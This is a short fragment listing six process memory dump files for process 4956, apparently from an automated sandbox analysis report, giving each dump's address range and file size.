          • memory/4956-285-0x0000000005A30000-0x0000000005A96000-memory.dmp

            Filesize

            408KB

          • memory/4956-284-0x00000000051F0000-0x0000000005212000-memory.dmp

            Filesize

            136KB

          • memory/4956-281-0x0000000004D50000-0x0000000004D60000-memory.dmp

            Filesize

            64KB

          • memory/4956-282-0x0000000004D50000-0x0000000004D60000-memory.dmp

            Filesize

            64KB

          • memory/4956-279-0x0000000074F80000-0x0000000075730000-memory.dmp

            Filesize

            7.7MB

          • memory/4956-278-0x00000000028B0000-0x00000000028E6000-memory.dmp

            Filesize

            216KB